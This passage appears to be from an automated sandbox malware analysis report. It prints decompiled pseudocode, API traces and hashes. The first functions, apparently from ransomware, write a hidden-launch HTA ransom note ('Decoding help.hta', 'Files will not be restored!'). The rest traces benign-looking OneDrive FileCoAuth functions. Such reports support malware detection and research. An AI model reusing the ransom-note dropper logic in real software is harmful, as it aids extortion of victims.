Files will not be restored!</h1></br></br><div id=\'X\' style=\'position:absolute;left:40%;color:#F00\'></div></body></html>",  *0x403ab3,  &_v16, 0);
    					CloseHandle(_v8);
    					SetFileAttributesW(_v12, 1);
    				}
    				return GlobalFree(_v12);
    			}

    APIs
      • Part of subcall function 00401781: GlobalAlloc.KERNEL32(00000040,?,?,004010A6,00008000), ref: 00401789
      • Part of subcall function 00401781: Sleep.KERNEL32(000000C8,00000040,?,?,004010A6,00008000), ref: 00401797
    • lstrcpyW.KERNEL32 ref: 004010AF
    • lstrlenW.KERNEL32(?,?,?,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 004010B7
    • lstrcatW.KERNEL32(?,Decoding help.hta), ref: 004010CC
    • GetFileAttributesW.KERNEL32(?,?,?,?,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 004010D4
    • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000,?,?,?,?,0000002C,00000000,00000000,?,?), ref: 004010F2
    • WriteFile.KERNEL32(004017A2,<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000,?,?,?,?,0000002C), ref: 0040110E
    • CloseHandle.KERNEL32(004017A2,004017A2,<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000,?,?,?,?), ref: 00401116
    • SetFileAttributesW.KERNEL32(?,00000001,004017A2,004017A2,<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000,?,?), ref: 00401120
    • GlobalFree.KERNEL32 ref: 00401128
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.593332961.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.593319076.0000000000400000.00000002.sdmp
    • Associated: 00000000.00000001.593340737.0000000000402000.00000002.sdmp
    • Associated: 00000000.00000001.593354738.0000000000403000.00000008.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_module.jbxd
    Similarity
    • API ID: File$AttributesGlobal$AllocCloseCreateFreeHandleSleepWritelstrcatlstrcpylstrlen
    • String ID: Decoding help.hta
    • API String ID: 1426208985-3468781980
    • Opcode ID: 9761cd351f3edd8d3100a3e78f095c631499d3c334115afeaf584d012286736b
    • Instruction ID: a07d22388665de9fc9c644ac664cd7531801e3a95f641c2fda75b2bfcd3adf1b
    • Opcode Fuzzy Hash: 9761cd351f3edd8d3100a3e78f095c631499d3c334115afeaf584d012286736b
    • Instruction Fuzzy Hash: 09F06530804109BACF017BA6CC82A8D7E72AF0431CF1042B7F914351F2DB7906A2975D
    Uniqueness

    Uniqueness Score: -1,00%

    Control-flow Graph

    C-Code - Quality: 100%
    			E00401096(WCHAR* _a4) {
    				void* _v8;
    				WCHAR* _v12;
    				long _v16;
    				WCHAR* _t18;
    
    				_t18 = E00401781(0x8000);
    				_v12 = _t18;
    				lstrcpyW(_v12, _a4);
    				 *((char*)(_v12 + lstrlenW(_v12) * 2 - 6)) = 0;
    				lstrcatW(_v12, 0x40379e);
    				if(GetFileAttributesW(_v12) == 0xffffffff) {
    					_v8 = CreateFileW(_v12, 0x40000000, 2, 0, 2, 0, 0);
    					WriteFile(_v8, 0x403006,  *0x403ab3,  &_v16, 0);
    					CloseHandle(_v8);
    					SetFileAttributesW(_v12, 1);
    				}
    				return GlobalFree(_v12);
    			}

    APIs
      • Part of subcall function 00401781: GlobalAlloc.KERNEL32(00000040,00401160,?,00401160,00004000), ref: 00401789
      • Part of subcall function 00401781: Sleep.KERNEL32(000000C8,00000040,00401160,?,00401160,00004000), ref: 00401797
    • lstrcpyW.KERNEL32 ref: 004010AF
    • lstrlenW.KERNEL32(?,?,?,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 004010B7
    • lstrcatW.KERNEL32(?,0040379E), ref: 004010CC
    • GetFileAttributesW.KERNEL32(?,?,?,?,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 004010D4
    • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000,?,?,?,?,0000002C,00000000,00000000,?,?), ref: 004010F2
    • WriteFile.KERNEL32(004017A2,00403006,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000,?,?,?,?,0000002C), ref: 0040110E
    • CloseHandle.KERNEL32(004017A2,004017A2,00403006,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000,?,?,?,?), ref: 00401116
    • SetFileAttributesW.KERNEL32(?,00000001,004017A2,004017A2,00403006,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000,?,?), ref: 00401120
    • GlobalFree.KERNEL32 ref: 00401128
    Memory Dump Source
    • Source File: 00000000.00000002.2314699615.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2314689692.0000000000400000.00000002.sdmp
    • Associated: 00000000.00000002.2314712936.0000000000402000.00000002.sdmp
    • Associated: 00000000.00000002.2314722815.0000000000403000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_module.jbxd
    Similarity
    • API ID: File$AttributesGlobal$AllocCloseCreateFreeHandleSleepWritelstrcatlstrcpylstrlen
    • String ID:
    • API String ID: 1426208985-0
    • Opcode ID: 9761cd351f3edd8d3100a3e78f095c631499d3c334115afeaf584d012286736b
    • Instruction ID: a07d22388665de9fc9c644ac664cd7531801e3a95f641c2fda75b2bfcd3adf1b
    • Opcode Fuzzy Hash: 9761cd351f3edd8d3100a3e78f095c631499d3c334115afeaf584d012286736b
    • Instruction Fuzzy Hash: 09F06530804109BACF017BA6CC82A8D7E72AF0431CF1042B7F914351F2DB7906A2975D
    Uniqueness

    Uniqueness Score: -1,00%

    Execution Graph

    Execution Coverage:4.6%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:3.2%
    Total number of Nodes:378
    Total number of Limit Nodes:16

    Graph


    Executed Functions

    Control-flow Graph

    C-Code - Quality: 79%
    			E00EA32C6(intOrPtr* _a4) {
    				intOrPtr* _t5;
    				intOrPtr _t7;
    
    				_t5 =  *_a4;
    				if( *_t5 != 0xe06d7363 ||  *((intOrPtr*)(_t5 + 0x10)) != 3) {
    					L6:
    					return 0;
    				} else {
    					_t7 =  *((intOrPtr*)(_t5 + 0x14));
    					if(_t7 == 0x19930520 || _t7 == 0x19930521 || _t7 == 0x19930522 || _t7 == 0x1994000) {
    						L00EA3216();
    						asm("int3");
    						_push(E00EA32C6); // executed
    						L00EA3586(); // executed
    						return 0;
    					} else {
    						goto L6;
    					}
    				}
    			}

    APIs
    • ?terminate@@YAXXZ.MSVCR120 ref: 00EA3301
    • __crtSetUnhandledExceptionFilter.MSVCR120(00EA32C6), ref: 00EA330C
    Strings
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ?terminate@@ExceptionFilterUnhandled__crt
    • String ID: csm
    • API String ID: 327099231-945121583
    • Opcode ID: 19d27d24a354aee91fd6b04bf48b0ecc1ff464a07eaaa920ff20893a47ae9503
    • Instruction ID: c962a8837da7e8527aeb5bc85e7de9134e2a83cb455026d7641aaea887392166
    • Opcode Fuzzy Hash: 19d27d24a354aee91fd6b04bf48b0ecc1ff464a07eaaa920ff20893a47ae9503
    • Instruction Fuzzy Hash: 81E022395083008B4F28DD7D908591837C86B1B3057862405F645EF621CB20FF90C1A2
    Uniqueness

    Uniqueness Score: -1,00%

    Control-flow Graph

    C-Code - Quality: 37%
    			E00E92E4B(void* __ecx) {
    				char* _t2;
    				void* _t3;
    				void* _t5;
    
    				_t2 = L"FileCoAuth";
    				__imp__?LoggingInitializeForExternalComponent@@YGJPB_W0_NG110@Z(_t2, _t2, 0, 0, 0, 0, 0); // executed
    				_t3 = E00E930BA(_t2, __ecx, _t5, __ecx); // executed
    				return _t3;
    			}

    APIs
    • ?LoggingInitializeForExternalComponent@@YGJPB_W0_NG110@Z.LOGGINGPLATFORM(FileCoAuth,FileCoAuth,00000000,00000000,00000000,00000000,00000000), ref: 00E92E59
    Strings
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Component@@ExternalG110@InitializeLogging
    • String ID: FileCoAuth
    • API String ID: 2036469951-891463421
    • Opcode ID: 5a9067c2c7daa64de9ce2818ba5c3687ab4e6e198c46dcd7d2439e7666340336
    • Instruction ID: a20504f3168b5c6aae509bebe845ec3f2767494020fe7df25ab64d5c29f67cde
    • Opcode Fuzzy Hash: 5a9067c2c7daa64de9ce2818ba5c3687ab4e6e198c46dcd7d2439e7666340336
    • Instruction Fuzzy Hash: 88B012F52201003EDE00A3740D0DE371D9CE75E3007005C103545F1053C924EC044231
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 53%
    			E00E930BA(signed int __eax, void* __ecx, void* __edi) {
    				char _v8;
    				WCHAR* _t5;
    				signed int _t8;
    				void* _t13;
    				void* _t14;
    				void* _t15;
    				signed int _t16;
    
    				_t14 = __edi;
    				_push(__ecx);
    				if( *0xeb2314 == 0) {
    					__imp__CoInitializeEx(0, 0, _t15); // executed
    					_t16 = __eax;
    					_v8 = __eax;
    					if(__eax >= 0) {
    						 *0xeb1826 = 1;
    						L7:
    						_t5 = GetCommandLineW();
    						_t12 =  &_v8;
    						if(E00E93234(_t5,  &_v8) != 1) {
    							_t16 = _v8;
    						} else {
    							_t8 = E00E9330A(_t12, _t13, _t14, _t12); // executed
    							_t16 = _t8;
    						}
    						if( *0xeb1826 != 0) {
    							__imp__CoUninitialize();
    						}
    						L12:
    						return _t16;
    					}
    					if(__eax != 0x80010106) {
    						goto L12;
    					}
    					if(GetModuleHandleW(L"Mscoree.dll") != 0) {
    						goto L7;
    					}
    					goto L12;
    				}
    				return __eax | 0xffffffff;
    			}

    APIs
    • CoInitializeEx.OLE32(00000000,00000000), ref: 00E930D3
    • GetModuleHandleW.KERNEL32(Mscoree.dll), ref: 00E930EF
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: HandleInitializeModule
    • String ID: Mscoree.dll
    • API String ID: 2866158306-4150509846
    • Opcode ID: 152f93c3ad9e301dd0bb013e520a6e49a000ea8e6ee00f735c14c1318d080801
    • Instruction ID: 5668e5b6f4fa30090947d2fe09dc1c4cf6b5edf07623af9ca3c46a0f5f2b525a
    • Opcode Fuzzy Hash: 152f93c3ad9e301dd0bb013e520a6e49a000ea8e6ee00f735c14c1318d080801
    • Instruction Fuzzy Hash: 6B014930946251AFCF3497779C0979BBE949B1A764F141288FC90B31A0D6B05E4983E2
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 68%
    			E00E93696(intOrPtr __ecx) {
    				void* _t1;
    				void* _t3;
    				void* _t5;
    				intOrPtr _t10;
    				void* _t13;
    				intOrPtr* _t14;
    				void* _t15;
    				void* _t17;
    
    				_t9 = __ecx;
    				_t1 =  *0xeb237c;
    				_t14 =  *0xeb2378;
    				_t13 = 1;
    				while(_t14 < _t1) {
    					if(_t13 >= 0) {
    						_t9 =  *_t14;
    						if( *_t14 != 0) {
    							_t3 = E00E91FC9(_t9, _t9); // executed
    							_t13 = _t3;
    							_t1 =  *0xeb237c;
    						}
    						_t14 = _t14 + 4;
    						continue;
    					}
    					L18:
    					return _t13;
    				}
    				_t17 = _t13;
    				if(_t17 >= 0) {
    					if(_t17 != 0) {
    						 *0xeb1824 = 0;
    					} else {
    						if( *0xeb1824 == 0) {
    							__imp__CoResumeClassObjects();
    							_t13 = _t1;
    							goto L15;
    						} else {
    							_t5 = E00E93A2E(_t9); // executed
    							_t15 = _t5;
    							if(_t15 != 0) {
    								__imp__CoResumeClassObjects();
    								_t13 = _t5;
    								if(_t13 < 0) {
    									SetEvent( *0xeb1818);
    									_t10 =  *0xeb181c; // 0x0
    									WaitForSingleObject(_t15, _t10 + _t10);
    								}
    								FindCloseChangeNotification(_t15); // executed
    								L15:
    								if(_t13 < 0) {
    									goto L16;
    								}
    							} else {
    								_t13 = 0x80004005;
    								L16:
    								E00E93A97();
    							}
    						}
    					}
    				}
    				goto L18;
    			}

    APIs
    • CoResumeClassObjects.OLE32(?,00000000,00E93324,?,00000000), ref: 00E936EB
    • SetEvent.KERNEL32(?,00000000,00E93324,?,00000000), ref: 00E936FD
    • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000,00E93324,?,00000000), ref: 00E9370D
    • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,00E93324,?,00000000), ref: 00E93714
    • CoResumeClassObjects.OLE32(?,00000000,00E93324,?,00000000), ref: 00E9371C
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ClassObjectsResume$ChangeCloseEventFindNotificationObjectSingleWait
    • String ID:
    • API String ID: 1460886804-0
    • Opcode ID: 529ba9df74a246e194cc9a985279cc27e0f9bce53419d2756cbaf2d89a1b4f11
    • Instruction ID: 85538d99374b0e963115607366bff9a00a9c6c04e81e2bf57ad64da754b0b78d
    • Opcode Fuzzy Hash: 529ba9df74a246e194cc9a985279cc27e0f9bce53419d2756cbaf2d89a1b4f11
    • Instruction Fuzzy Hash: 361148B75044129FCF3A87B6FC44A5726E1AF8A320719112AE946B3321DB31EE098361
    Uniqueness

    Uniqueness Score: -1,00%

    Control-flow Graph

    • Executed
    • Not Executed
    • Nodes: 43 e93a2e-e93a53 CreateEventW; 44 e93a88-e93a96 call ea29f2; 45 e93a55-e93a71 CreateThread; 46 e93a73-e93a7f CloseHandle; 47 e93a85-e93a87
    • Edges: 43->44, 43->45, 45->46, 45->47, 46->47, 47->44
    C-Code - Quality: 50%
    			E00E93A2E(void* __ecx) {
    				signed int _v8;
    				long _v12;
    				void* __edi;
    				void* __esi;
    				signed int _t4;
    				void* _t6;
    				void* _t9;
    				void* _t12;
    				void* _t16;
    				void* _t19;
    				void* _t20;
    				signed int _t22;
    
    				_push(__ecx);
    				_push(__ecx);
    				_t4 =  *0xeb0090; // 0xbd336131
    				_v8 = _t4 ^ _t22;
    				_t6 = CreateEventW(0, 0, 0, 0);
    				 *0xeb1818 = _t6;
    				if(_t6 != 0) {
    					_push(_t20);
    					_t9 = CreateThread(0, 0, E00E93AD2, ",v�", 0,  &_v12); // executed
    					if(_t9 == 0) {
    						CloseHandle( *0xeb1818);
    						 *0xeb1818 = 0;
    					}
    					_pop(_t20);
    				}
    				_pop(_t19);
    				return E00EA29F2(_t12, _v8 ^ _t22, _t16, _t19, _t20);
    			}

    APIs
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000001,?,?,?,00E936DE,?,00000000,00E93324,?,00000000), ref: 00E93A46
    • CreateThread.KERNELBASE ref: 00E93A67
    • CloseHandle.KERNEL32(?,?,?,00E936DE,?,00000000,00E93324,?,00000000), ref: 00E93A79
    Strings
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Create$CloseEventHandleThread
    • String ID: ,v
    • API String ID: 1227790905-18191835
    • Opcode ID: e7c38c5a61c31b948a67429427ad01704410128bb6402f3f83fd7bf86af6ab05
    • Instruction ID: cff63be81d8e61338a1a38d84a0bb85e94e792fe404eca987dfce2b27e9e1491
    • Opcode Fuzzy Hash: e7c38c5a61c31b948a67429427ad01704410128bb6402f3f83fd7bf86af6ab05
    • Instruction Fuzzy Hash: EEF06832600254BF87219B6BAC59C6B7BFCEBDBB21751026EF804F2210DA71AD45C6A0
    Uniqueness

    Uniqueness Score: -1,00%

    APIs
    • RegGetValueW.KERNELBASE(80000001,Software\Microsoft\OneDrive,EnableTHDFFeatures,00000010,?,?,?), ref: 00EA0BE3
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Value
    • String ID: EnableTHDFFeatures$Software\Microsoft\OneDrive
    • API String ID: 3702945584-3051962838
    • Opcode ID: 701d07e98555256bfe32c27018713ff477bbf2591f09019964ebbd822af00ebe
    • Instruction ID: 29712cb7b6354bff606d596f4262dc8f999285d33a32a1f7637a2cb3c304bfbf
    • Opcode Fuzzy Hash: 701d07e98555256bfe32c27018713ff477bbf2591f09019964ebbd822af00ebe
    • Instruction Fuzzy Hash: 0EF06D7698030CFFDB10CF958D85AEEBBBCEB49308F1041ABE904B7141E671AB58CA51
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 50%
    			E00E93A2E(void* __ecx) {
    				signed int _v8;
    				long _v12;
    				void* __edi;
    				void* __esi;
    				signed int _t4;
    				void* _t6;
    				void* _t9;
    				void* _t12;
    				void* _t16;
    				void* _t19;
    				void* _t20;
    				signed int _t22;
    
    				_push(__ecx);
    				_push(__ecx);
    				_t4 =  *0xeb0090; // 0xbb40e64e
    				_v8 = _t4 ^ _t22;
    				_t6 = CreateEventW(0, 0, 0, 0);
    				 *0xeb1818 = _t6;
    				if(_t6 != 0) {
    					_push(_t20);
    					_t9 = CreateThread(0, 0, E00E93AD2, 0xeb17e8, 0,  &_v12); // executed
    					if(_t9 == 0) {
    						CloseHandle( *0xeb1818);
    						 *0xeb1818 = 0;
    					}
    					_pop(_t20);
    				}
    				_pop(_t19);
    				return E00EA29F2(_t12, _v8 ^ _t22, _t16, _t19, _t20);
    			}

    APIs
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000001,?,?,?,00E936DE,?,00000000,00E93324,?,00000000), ref: 00E93A46
    • CreateThread.KERNELBASE ref: 00E93A67
    • CloseHandle.KERNEL32(?,?,?,00E936DE,?,00000000,00E93324,?,00000000), ref: 00E93A79
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Create$CloseEventHandleThread
    • String ID:
    • API String ID: 1227790905-0
    • Opcode ID: e7c38c5a61c31b948a67429427ad01704410128bb6402f3f83fd7bf86af6ab05
    • Instruction ID: cff63be81d8e61338a1a38d84a0bb85e94e792fe404eca987dfce2b27e9e1491
    • Opcode Fuzzy Hash: e7c38c5a61c31b948a67429427ad01704410128bb6402f3f83fd7bf86af6ab05
    • Instruction Fuzzy Hash: EEF06832600254BF87219B6BAC59C6B7BFCEBDBB21751026EF804F2210DA71AD45C6A0
    Uniqueness

    Uniqueness Score: -1,00%

    APIs
    • CoRegisterClassObject.OLE32(?,00000000,00000004,00000005,?), ref: 00E9200D
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ClassObjectRegister
    • String ID:
    • API String ID: 352222023-0
    • Opcode ID: 058cbf9c1edc0d0cc5cf706dd16d694e6b1a1faf3e9b99b8500b2429d9593308
    • Instruction ID: c5575ea81c4307cc10e0dd0a850470dc156014312b4cde881ee5e9a53758cf9c
    • Opcode Fuzzy Hash: 058cbf9c1edc0d0cc5cf706dd16d694e6b1a1faf3e9b99b8500b2429d9593308
    • Instruction Fuzzy Hash: 5A017C71600204BFDB248B59DC45F6BBBE9EF89715F14016DB545E7250DA71ED00DA14
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 37%
    			E00EA2BBA(void* __eflags, intOrPtr _a4) {
    				void* __ebp;
    				signed int _t2;
    				void* _t6;
    				void* _t8;
    				void* _t9;
    
    				_push(_a4);
    				_t2 = E00EA2B11(_t6, _t8, _t9, __eflags); // executed
    				asm("sbb eax, eax");
    				return  ~( ~_t2) - 1;
    			}

    APIs
    • __onexit.MSVCRT ref: 00EA2BC0
      • Part of subcall function 00EA2B11: RtlDecodePointer.NTDLL(00EADA60,00000014,00EA2BC5,?,?,00E91341,00EA5971,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00EB19FC), ref: 00EA2B2D
      • Part of subcall function 00EA2B11: _onexit.MSVCR120 ref: 00EA2B3A
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: DecodePointer__onexit_onexit
    • String ID:
    • API String ID: 504067560-0
    • Opcode ID: 42b573c69077f550dc806ad7d788cda62597c3fb396cd59d1e96175e938ce5e4
    • Instruction ID: 431786529e64401982048fb366db99ee8244d47c752939dd0073d934ca9b6b62
    • Opcode Fuzzy Hash: 42b573c69077f550dc806ad7d788cda62597c3fb396cd59d1e96175e938ce5e4
    • Instruction Fuzzy Hash: 2EB012311A810E2BBE047DF9EC068343B8CC6126607401726FD0DD80F1DD12B4501090
    Uniqueness

    Uniqueness Score: -1,00%

    Non-executed Functions

    APIs
      • Part of subcall function 00E982B9: GetLastError.KERNEL32(BD336131,?,?,?,?,?,00EA3B19,000000FF,?,00E967F9,?,d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\win32api.cpp,000001D1,Win32Api::TaskDialogIndirect,pTaskConfig != NULL,pTaskConfig was NULL), ref: 00E98313
      • Part of subcall function 00E982B9: memset.MSVCR120 ref: 00E98329
      • Part of subcall function 00E982B9: memset.MSVCR120 ref: 00E98369
      • Part of subcall function 00E982B9: _vsnwprintf.MSVCR120 ref: 00E98385
    • memset.MSVCR120 ref: 00E96A3B
    • GetUserNameW.ADVAPI32(?,00000100), ref: 00E96A55
    Strings
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: memset$ErrorLastNameUser_vsnwprintf
    • String ID: (result != 0) && (buffer[0] != 'L\0')$Couldn't get user name.$Null argument: pUserName$Win32Api::GetUserNameW$d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\win32api.cpp$pUserName != NULL
    • API String ID: 2966023224-1689460303
    • Opcode ID: 63dd94b099a62da7ab77a60c6d12d8fd114c2b7b44a0a58bde7b7f0e727c71c0
    • Instruction ID: bb84d5f597b9a4bf1d62ec5bdefa9e0eb85ddef787a3d60f974f936ed567e55f
    • Opcode Fuzzy Hash: 63dd94b099a62da7ab77a60c6d12d8fd114c2b7b44a0a58bde7b7f0e727c71c0
    • Instruction Fuzzy Hash: 411159B2A443047BDA10EB619C0AEAB73DCDBCAB10F00591AB554FB181EE70ED4483A2
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 85%
    			E00E9A394(WCHAR* __ecx) {
    				signed int _v8;
    				void _v530;
    				short _v532;
    				struct _WIN32_FIND_DATAW _v1124;
    				void* _v1128;
    				char _v1148;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t23;
    				WCHAR* _t27;
    				WCHAR* _t33;
    				void* _t57;
    				WCHAR* _t58;
    				signed int _t59;
    				void* _t60;
    				void* _t61;
    
    				_t23 =  *0xeb0090; // 0xbd336131
    				_v8 = _t23 ^ _t59;
    				_t58 = __ecx;
    				_v1124.dwFileAttributes = 0;
    				memset( &(_v1124.ftCreationTime), 0, 0x24c);
    				_t61 = _t60 + 0xc;
    				if(_t58[0xa] < 8) {
    					_t27 = _t58;
    				} else {
    					_t27 =  *_t58;
    				}
    				_t57 = FindFirstFileW(_t27,  &_v1124);
    				if(_t57 == 0xffffffff) {
    					L12:
    					return E00EA29F2(0, _v8 ^ _t59, _t56, _t57, _t58);
    				} else {
    					do {
    						_v532 = 0;
    						memset( &_v530, 0, 0x206);
    						_t61 = _t61 + 0xc;
    						if(_t58[0xa] < 8) {
    							_t33 = _t58;
    						} else {
    							_t33 =  *_t58;
    						}
    						if(E00E9A31C( &_v532, 0x104, _t33) >= 0) {
    							PathRemoveFileSpecW( &_v532);
    							_t56 =  &(_v1124.cFileName);
    							if(E00E99383( &_v532,  &(_v1124.cFileName)) >= 0) {
    								E00E94E9D( &_v1148,  &_v532);
    								_t46 =  >=  ? _v1148 :  &_v1148;
    								__imp__WerRegisterFile( >=  ? _v1148 :  &_v1148, 2, 0);
    								E00E94307( &_v1148, 1, 0);
    							}
    						}
    					} while ((FindNextFileW(_t57,  &_v1124) & 0xffffff00 | _t37 != 0x00000000) == 1);
    					FindClose(_t57);
    					goto L12;
    				}
    			}

    APIs
    • memset.MSVCR120 ref: 00E9A3C3
    • FindFirstFileW.KERNEL32(?,?,00000007,00000000,00000001), ref: 00E9A3DF
    • memset.MSVCR120 ref: 00E9A406
    • PathRemoveFileSpecW.SHLWAPI(?,?,00000104,?), ref: 00E9A437
    • WerRegisterFile.KERNEL32(?,00000002,00000000,?), ref: 00E9A47C
    • FindNextFileW.KERNEL32(00000000,?,?,00000104,?), ref: 00E9A498
    • FindClose.KERNEL32(00000000), ref: 00E9A4AC
    Memory Dump Source
